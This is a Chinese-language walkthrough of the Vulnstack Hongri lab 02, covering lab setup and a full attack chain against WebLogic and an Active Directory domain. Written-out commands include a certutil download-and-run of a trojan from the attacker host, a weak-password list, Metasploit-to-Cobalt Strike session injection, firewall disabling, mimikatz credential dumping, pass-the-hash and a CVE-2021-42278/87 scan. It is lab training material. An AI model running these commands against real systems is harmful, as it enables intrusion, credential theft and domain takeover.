红日靶场02通关记录

总体来说，只要靶场01完全掌握了，02就十分简单。推荐先看：

红日靶场第一关与内网信息收集小总结

靶场下载：http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

0x01 靶场搭建

可参考上方下载链接的靶场搭建详情进行搭建。这里附上我的搭建步骤，因为里面有个小坑点，大家如果遇到了问题可以参考我的搭建方式。

1、三个机器先不要开机，要先创建两个仅主机的网段，用来模拟外网与内网。

我这里分别是vmnet4:192.168.111.0/24和vmnet3:10.10.10.0/24。

2、配置三个虚拟机的网络。DC很简单，改为vmnet3即可。（我这里为了截图，机器别开机哈）

PC的网卡默认是下图，注意这个顺序，两个网卡对应的网段。默认的NAT就是提示我们改成模拟外网网段，仅主机就是提示我们改成自己的内网网段。

这里不能把顺序弄反，不然连接不了域网路哦，再去改会很麻烦。

同理，配置一下WEB的网络。

3、随后开启虚拟机进行查看网络，开机登录的顺序为DC——>PC——>WEB，默认密码都是1qaz@WSX。因为DC就是域控，域环境配置要先配置域控；随后就是PC，这个PC是mssql数据库的机器，最好也先配置一下，最后再登录WEB机器。WEB机器默认密码登录显示错误，我们在DC机器的域环境中新建一个weblogic用户，WEB机器用weblogic登录就行了。

所有的机器与用户登录表如下：

配置完毕后用域成员机器或者域控ping一下，能通就行。

4、最后一步，管理员身份运行WEB机器这个脚本即可（不以管理员身份运行的话会启动不了服务）

C:OracleMiddlewareuser_projectsdomainsbase_domainbinstrartWebLogic.cmd

访问http://192.168.111.80:7001/console自动跳转登录页面，成功搭建。

5、至于他所说的防火墙策略也就是在WEB机器上做了防火墙策略，不让我们物理机直接访问罢了，为了模拟真实的外网环境而已。不用特别在意。

0x02 外网渗透

weblogic攻击思路

weblogic中间件的攻击手法，基本上分两类：弱口令进入后台部署war包与RCE。账号与弱口令整理如下，均失败。

system:passwordweblogic:weblogicguest:guestportaladmin:portaladminadmin:securityjoe:passwordmarry:passwordsystem:securitywlcsystem:wlcsystemwlcsystem:sipisystem

通过页面发现版本为10.3.6.0，此版本出现过反序列化RCE漏洞，访问 _async/AsyncResponseService 验证

说明存在CVE-2019-2725漏洞。直接利用脚本进行攻击。https://github.com/TopScrew/CVE-2019-2725

python3 weblogic-2019-2725.py 10.3.6 http://192.168.111.80:7001

复制一下这个shell地址访问看一下，执行了ipconfig命令。

通过执行systeminfo得知为win08 R2 x64系统

同理我使用下方的一系列命令进行信息收集，得出个结论：当前机器存在内网与域环境，当前获取的用户是域控权限，并且存在360杀软；有java无python环境；

whoami /user #当前用户与SIDquery userwmic process list brief #查看进程wmic product get name,version #查看安装的软件等，这个命令耗时很长，谨慎使用

上线方法一：利用脚本远程下载木马

1、由于我获得的是管理员权限，尝试关闭进程，但是响应码为500，关闭失败。

2、msf生成对应木马并监听，用kalipython开启一个http服务，通过RCE下载这个木马成功上线

http://192.168.111.80:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=certutil -urlcache -split -f http://192.168.111.11:2222/shell.exehttp://192.168.111.80:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=shell.exe

3、到这里我其实比较诧异，就是其实不用做免杀，直接用msf生成的木马也可以直接上线，360并没有报警拦截。为什么？关于免杀这里，先放一边，以后出文章介绍哈。

上线方法二：利用msf的weblogic攻击模块

1、search weblogic后，因为这个漏洞是2019年的，我们尝试用一下这个模块

2、emmm，没有攻击成功，不过这也是一种利用方式。

use 11  set lhost 192.168.111.11  set lport 7410  set rhosts 192.168.111.11  show targets  set target 1  #选择windows系统exploit -j -z  #后台运行不占用前台

0x03 内网渗透

MSF会话转移到CS

1、MSF先进程迁移

2、将system会话转移到CS

use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_http #一定要是http，并且不能带有x64set lhost 192.168.111.11set lport 7777 #指定CS开启的一个监听即可set disablepayloadhandler 1run

内网探测并绘制攻击路线图

内网探测就不多赘述，详情可看红日靶场01的文章：

红日靶场第一关与内网信息收集小总结

根据收集来的信息绘制网络拓扑

尝试ms17_010攻击域控

1、先将边界机WEB机器的防火墙关闭，以防正向流量攻击失败。

netsh advfirewall show all state #查看防火墙状态netsh advfirewall set allprofiles state off #关闭防火墙netsh advfirewall set allprofiles state on #打开防火墙

2、使用永恒之蓝打域控失败。

hash获取

使用CS的run mimikatz模块直接获取到明文密码，虽然WEB机器没有登录过域控账号，但是他的weblogic是域管理员权限启动的，也是可以获取的。

hash传递

1、CS上看到，我们这里无法dir查看域控的admin$目录，所以无法hash传递

2、但是我们可以查看mssql的，所以我们先通过hash传递，利用域控administrator的账号和密码直接将mssql上线

域提权获取黄金票据

1、所以我们要利用其它方式例如域提权漏洞CVE-2021-42278/87来获取票据，从而让目标上线。因为对方机器为win08，在没有打补丁的情况下很容易有此漏洞。这时候CS开启一个socks端口，并且配置proxychains，同样，再次提醒CS这里的socks为4版本。

2、通过信息收集，得出了当前机器的一个用户的名称与明文密码为weblogic:1qaz@WSX

同时也获取了域控机器的名称为DC

3、随后使用proxychains代理域提权获取黄金票据TGT

proxychains python3 scanner.py de1ay.com/weblogic:'1qaz@WSX' -dc-ip 10.10.10.10 -use-ldap

4、随后就可以dir遍历域控的445目录文件了，之后新建一个SMB监听会话，通过Hash传递即可上线成功。至此实验完毕。

0x04 考察知识总结

1、weblogic的搭建、计算机网络之windows防火墙配置命令

2、weblogic攻击方式CVE-2019-2725反序列化RCE。

3、bypass360免杀初探，可用veil框架、MSF免杀模块、Phanom等。

4、MSF与CS的会话互相转移。

5、内网信息收集，推荐使用wmic命令如下：

wmic process list brief #查看进程wmic product get name,version#查看系统安装软件版本环境等wmic useraccount get /all #用户信息收集

6、hash和明文获取与hash传递攻击方式

7、基于socks的tcp代理隧道搭建实现内网穿透

8、MS14-068或者CVE-2021-42278/87域成员提权获取黄金票据进而hash传递

总的来说，只要自己的漏洞库、知识库、武器库足够宽泛，应对这个2019年制作的红日靶场2是绰绰有余的。